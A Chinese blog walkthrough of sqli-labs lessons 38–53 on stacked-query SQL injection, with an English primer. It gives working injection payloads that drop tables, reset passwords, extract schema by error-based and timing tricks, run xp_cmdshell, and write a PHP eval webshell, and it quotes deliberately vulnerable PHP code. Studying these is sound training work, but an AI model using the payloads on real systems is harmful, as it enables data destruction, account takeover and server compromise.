SQLi Labs Stacked Injections ( Lesson38 - Lesson53 )

原创 2016年08月30日 22:12:26

第三部分:Stacked Injection


Stacked Queries


Execute multiple statements in the same query to extend the possibilities of SQL injections

Stacked queries provide a lot of control to the attacker. By terminating the original query and adding a new one, it will be possible to modify data and call stored procedures. This technique is massively used in SQL injection attacks and understanding its principle is essential to a sound understanding of this security issue.


Principle

In SQL, a semicolon indicates that the end of a statement has been reached and what follows is a new one. This allows executing multiple statements in the same call to the database server. Contrary to UNION attacks which are limited to SELECT statements,stacked queries can be used to execute any SQL statement or procedure. A classic attack using this technique could look like the following.

Malicious user input.

1; DELETE FROM products

 

Generated query with multiple statements. The parameter productid was not sanitized.

SELECT * FROM products WHERE productid=1; DELETE FROM products

When the query is executed, a product is returned by the first statement and all products are deleted by the second.


Stacked Queries Limitations

It is important to mention that query stacking does not work in every situation. Most of the time, this kind of attack is impossible because the API and/or database engine do not support this functionality. Insufficient rights could also explain why the attacker is unable to modify data or call some procedures.

Below is a list of query stacking support by the principal API and DBMS.

Stacked query support.

MySQL/PHP - Not supported (supported by MySQL for other API).

SQL Server/Any API - Supported.

Oracle/Any API - Not supported.

Even though we mentioned earlier that stacked queries can add any SQL statement, this injection technique is frequently limited when it comes to adding SELECTs.Both statements will be executed but software code is usually designed to handle the results returned by only one query. Consequently, the injected SELECT query will often generate an error or its results will simply be ignored. For this reason it is recommended to use UNION attacks when trying to extract data.

One last thing needs to be mentionned: to inject a valid SQL segment, the attacker will need to know some basic information such as table names, column names, etc. For more information refer to the section dedicated to information gathering.


Altering Data

The example presented at the beginning of the article demonstrates how query stacking can be used to delete information from the database. Instead of destroying data, attackers usually try to steal it or grant themselves high privileges on the system. A frequent approach is to change the administrator’s password. The example below illustrates a classic data modification using SQL injection.

User input.

1; UPDATE members SET password='pwd' WHERE username='admin'

 

Generated query.

SELECT * FROM products WHERE categoryid=1; UPDATE members SET password='pwd' WHERE username='admin'


Calling Stored Procedures

Calling a procedure can bring SQL injections attacks to a whole new level. Nowadays, many database management systems come with built in packages of functions and procedures to simplify development and provide new functionalities. Therefore, it becomes possible to communicate with network, control the operating system and do even more from a simple SQL statement.

As there is no convention between DBMS regarding to packages and procedures name, the attacker will have to identify which database system is used before trying to call a built-in procedure. From there, the principle is the same as examples presented earlier except that the injected query is a stored procedure call. Let see how it can be done with the use ofxp_shellcmd; a SQL Server’s specific command which allows executing operating system calls.

User input.

1; exec master..xp_cmdshell 'DEL important_file.txt'

 

Generated query.

SELECT * FROM products WHERE categoryid=1; exec master..xp_cmdshell 'DEL important_file.txt'

The query above will return a product list and delete "important_file.txt". A much more complex attack could have been launched to take control over the operating system, but this is outside the scope of this article. The injected statement is not limited to built-in packages; a user-defined procedure could also be called. This approach is not frequent but it could be useful in some specific cases.



Lesson - 38

GET - Stacked Query Injection - String


SQL语句结构:

select ... from table where id = '$id' limit 0,1;

根据前面所学,可以得到数据库名,表名,表中内容。

如,构造?id=0' union select 1,database(),user()--+


后台php部分源代码(方便阅读,有修改):

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
/* execute multi query */
mysqli_multi_query($sql))

关于mysqli_multi_query , 详细信息,http://php.net/manual/zh/mysqli.multi-query.php

正是由于后台用了该函数,才可以进行stacked injection


删除表referers:

?id=1';drop table referers;--+

由于后台:

if ($result = mysqli_store_result($con1))
{
      if($row = mysqli_fetch_row($result))
      {
          echo '<font size = "5" color= "#00FF00">';	
          printf("Your Username is : %s", $row[1]);
          echo "<br>";
          printf("Your Password is : %s", $row[2]);
          echo "<br>";
          echo "</font>";
      }
}

只显示了id=1的用户信息,"drop table referers" 成功与否,前端无法显示。

通过phpMyAdmin查看数据库Security,发现referers表已被删除。


修改用户密码:

?id=1';update users set password='fvck' where username='Dumb';--+


写入一个webshell:

?id=1';select "<?php phpinfo();@eval($_POST['foo']);?>" into outfile "D:/Program Files (x86)/wamp/www/sqli_labs/Less-38/phpinfo.php" --+


Lesson - 39

GET - Stacked Query Injection - intiger based


 SQL语句结构:

select .. from table where id = $id limit 0,1;

后台php源代码:

$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
/* execute multi query */
if (mysqli_multi_query($con1, $sql))
{
    /* store first result set */
    if ($result = mysqli_store_result($con1))
    {
        if($row = mysqli_fetch_row($result))
        {
            echo '<font size = "5" color= "#00FF00">';	
            printf("Your Username is : %s", $row[1]);
            echo "<br>";
            printf("Your Password is : %s", $row[2]);
            echo "<br>";
            echo "</font>";
        }
//            mysqli_free_result($result);
    }
        /* print divider */
    if (mysqli_more_results($con1))
    {
            //printf("-----------------\n");
    }
     //while (mysqli_next_result($con1));
}

注入方法,同上节。


Lesson - 40

GET - Blind Based - String - Stacked


SQL语句结构:

select ... from table_name where id=('$id') ...

php源码,验证:

$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";

注入方法略。


Lesson - 41

GET - Blind Based - intiger - Stacked


SQL语句结构:

select ...... from table_name where id=$id ......


构造 ?id=0 union select 1,2,3 --+

结果如图所示:



Lesson - 42

POST - Error based - String - stacked


创建新用户,和修改密码的链接都是提示让你hack the way。


首先尝试对login_user参数闭合引号,添加注释,以绕过password验证,没有奏效。

接着,构造如下POST表单数据

login_user=admin&login_password=123' or 1=1#&mysubmit=Login

结果如图所示:



如此通过添加 or 语句测试,只要得到数据库用户表的信息,就能注册新用户,或者更改密码。

构造如下表单数据

login_user=admin
&login_password=123' or (select 1 from (select count(*),concat((select table_name from information_schema.tables where table_schema = database() limit 0,1), '~' , floor (rand()*2))as a from information_schema.tables group by a) as b limit 0,1)#
&mysubmit=Login

刷新直至爆出表:


同理,可得到users表:


构造如下表单数据:

login_user=admin
&login_password=123' or (select 1 from (select count(*),concat((select column_name from information_schema.columns where table_schema = database() and table_name='users' limit 0,1), '~' , floor (rand()*2))as a from information_schema.tables group by a) as b limit 0,1)#
&mysubmit=Login

得到users表中的列名:


更改密码:

login_user=admin
&login_password=123';update users set password='fvck' where username='admin';#
&mysubmit=Login

 

php源代码:

$username = mysqli_real_escape_string($con1, $_POST["login_user"]);
$password = $_POST["login_password"];
......
$sql = "SELECT * FROM users WHERE username='$username' and password='$password'";
if (@mysqli_multi_query($con1, $sql))
{
    ........
}
.......

password没有进行过滤,mysqli_multi_query函数是成功注入的成因。



Lesson - 43

POST - Error based - String - Stacked with twist


构造如下表单数据:

login_user=admin&login_password=123456'or 1=1&mysubmit=Login

报错:



猜测SQL语句结构 select ... from users where username = ('login_user') and password = ('password') ...

验证:

login_user=admin&login_password=123456')or 1=1#&mysubmit=Login


注入方法同上节。



Lesson - 44

POST - Error based - String - Stacked - Blind


构造表单数据

login_user=admin&login_password=123456'or 1=1#&mysubmit=Login

结果如图所示:


猜测SQL语句结构:

select ... from table_name where username='$username' and password = '$password'......


PHP源代码:

$sql = "SELECT * FROM users WHERE username='$username' and password='$password'";
if (@mysqli_multi_query($con1, $sql))
{
      /* store first result set */
      if($result = @mysqli_store_result($con1))
      {
	 if($row = @mysqli_fetch_row($result))
	 {
	    if ($row[1])
	    {
	       return $row[1];
	    }
	    else
	    {
	       return 0;
	    }
	 }
      }
}

本节关闭了错误回显,盲注。

可以利用上述表单数据 login_user=admin&login_password=123456'or 1=1#&mysubmit=Login

中的 or 语句对数据库信息进行猜解,如果正确会成功以Dumb登陆。


如,构造如下表单数据:

login_user=admin&login_password=123456' or substring(version(),1,1)=4#&mysubmit=Login

结果未成功登陆。

说明当前数据库版本不是4。

将版本号改为5:

login_user=admin&login_password=123456' or substring(version(),1,1)=5#&mysubmit=Login

成功登陆。

通过此方法可以猜解更多信息。


Lesson - 45

POST - Error based - String - Stacked - Blind


猜测SQL语句结构:

select ... from table_name where username = ('$username') and password = ('$password')

查看PHP源代码验证:

$sql = "SELECT * FROM users WHERE username=('$username') and password=('$password')";
if (@mysqli_multi_query($con1, $sql))
{
        /* store first result set */
      if($result = @mysqli_store_result($con1))
      {
	 if($row = @mysqli_fetch_row($result))
	 {
	    if ($row[1])
	    {
	       return $row[1];
	    }
	    else
	    {
	       return 0;
	    }
	 }
      }
}

注入略。



Lesson - 46

GET - Error Based - Numeric - Order By clause


构造 ?sort=1,结果如图所示:

构造 ?sort=2



猜测SQL语句 select * from users order by $sort

PHP源代码:

$sql = "SELECT * FROM users ORDER BY $id";
$result = mysql_query($sql);

构造

?sort=(select 1 from (select count(*),concat((select table_name from information_schema.tables where table_schema = database() limit 0,1), '~' , floor (rand()*2))as a from information_schema.tables group by a) as b limit 0,1)


还可以利用延时注入

?sort=1 and if(length(database())=8,sleep(1),null)

这里等待了大概13s,因为users表中有13条数据。




Lesson - 47

GET - Error based - String - Order By Clause


猜测SQL语句结构:

select * from table_name order by '$id'


$sql = "SELECT * FROM users ORDER BY '$id'";
$result = mysql_query($sql);

构造:
?sort=1' and (select 1 from (select count(*),concat((select table_name from information_schema.tables where table_schema = database() limit 0,1), '~' , floor (rand()*2))as a from information_schema.tables group by a)as b limit 0,1)--+





Lesson - 48

GET- Error based - Blind - Numeric - Order By Clause


SQL语句结构:

select * from users order by $sort


注入略。



Lesson - 49

GET - Error based - String - Blind - Order By Clause


SQL语句结构:

select * from users order by '$sort'


注入略。



Lesson - 50

GET - Error based - Order By Clause - Numeric - Stacked Injection


SQL语句结构:

select * from users order by $sort


PHP源代码:

$sql="SELECT * FROM users ORDER BY $id";
/* execute multi query */
if (mysqli_multi_query($con1, $sql))
{
......
}

存在stacked Injection。

注入略。



Lesson - 51

GET - Error based - Order By Clause - String - Stacked Injection


SQL语句结构:

select * from users order by '$sort'

PHP源代码:

$sql="SELECT * FROM users ORDER BY '$id'";
/* execute multi query */
if (mysqli_multi_query($con1, $sql))
{
......
}

注入略。


Lesson - 52

GET - Blind based - Order By Clause - Numeric - Stacked Injection


构造:

?sort=1 and if(1=1,sleep(1),null)


SQL语句结构:

select * from users order by $sort


源码使用mysqli_multi_query函数,存在Stacked Injection注入。

注入略。



Lesson - 53

GET - Blind based - Order By Clause - String - Stacked Injection


构造:?sort=1'--+,返回正常结果。

SQL语句结构:

select * from users order by '$sort'


注入略。

版权声明:本文为博主原创文章,未经博主允许不得转载。

通过sqli-labs学习sql注入——基础挑战之less1-10

虽然sql注入接触过不少,其实也不太多,但是不系统,那就通过sqli-libs系统学习总结一下吧 我的学习的方法是什么呢? 先自己尝试一下注入,实在不行就看源码,再不行就看别人的指导,反正就是要弄...
  • u012763794
  • u012763794
  • 2016年05月02日 20:04
  • 27419

sqli-labs学习教程(一)

简介 结构化查询语言,也叫做SQL,从根本上说是一种处理数据库的编程语言。对于初学者,数据库仅仅是在客户端和服务端进行数据存储。SQL通过结构化查询,关系,面向对象编程等等来管理数据库。编程极客们总是...
  • qq_32400847
  • qq_32400847
  • 2016年12月03日 12:53
  • 5521

通过sqli-labs学习sql注入——基础挑战之less11-22

上一次就讲了基础挑战之less1-10,都是get型的,包含的种类也是比较多了,这次的是post型注入一般都是登陆绕过,当然也是可以获取数据库的信息,具体看下面的实验吧。 一些基础的知识上一篇基础挑战...
  • u012763794
  • u012763794
  • 2016年05月19日 14:11
  • 12380

[sqli-labs]下载与部署

sqli-labs简介 对于想要学习web安全的同学 , 这是一个非常好的学习有关SQL注入的学习资料 类似于闯关的模式 , 每一个关卡都有非常多的思路和利用方式 这些关卡包含了各种...
  • ncafei
  • ncafei
  • 2017年01月12日 14:08
  • 671

sqli-labs学习教程(三)

第一篇链接:sqli-labs学习教程(一) 第二篇链接:sqli-labs学习教程(二) 本文转载自通过sqli-labs学习sql注入——基础挑战之less1-10 第六节:GET – Doubl...
  • qq_32400847
  • qq_32400847
  • 2016年12月06日 15:41
  • 1266

SQLi-Labs 学习笔记(Less 31-40)

SQLi-Labs 学习笔记 SQL 百度百科:结构化查询语言,也叫做SQL,从根本上说是一种处理数据库的编程语言。对于初学者,数据库仅仅是在客户端和服务端进行数据存储。SQL通过结构化查询,关系,...
  • SmithJackHack
  • SmithJackHack
  • 2017年05月25日 15:11
  • 624

sqli-labs学习教程(七)

下面开始Challenges部分的学习。 第五十四节:GET – challenge – Union – 10 queries allowed – Variation 1 这一节只允许通过不多于10次...
  • qq_32400847
  • qq_32400847
  • 2017年02月27日 09:33
  • 365

SQLi Labs Challenges ( Lesson54 - Lesson65 )

Lesson - 54 GET - Challenge - Union - 10 queries allowed - Variation 1 多次测试,以猜测后台SQL语句结构, 当构造 ?...
  • x728999452
  • x728999452
  • 2016年09月01日 10:06
  • 230

【SQL注入】windows下sqli-labs的搭建

sqli-libs是一个联系SQL注入的平台,包括联合查询注入、盲注、头部注入、过安全狗等 源码下载 下载地址:https://github.com/Audi-1/sqli-labs 运行环境要...
  • qq_27214561
  • qq_27214561
  • 2017年05月30日 12:16
  • 1636

Win7下 Sqli-labs 环境搭建

最近准备学习sql注入,来搭建一下Sqli-labs,折腾了我好久,终于搭建起来了。 ok,废话不多说,开始搭建! 平台:Win7 SP1 需要准备的东西: 1. Sqli-labs ,下...
  • SmithJackHack
  • SmithJackHack
  • 2017年05月16日 16:53
  • 475
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:SQLi Labs Stacked Injections ( Lesson38 - Lesson53 )
举报原因:
原因补充:

(最多只允许输入30个字)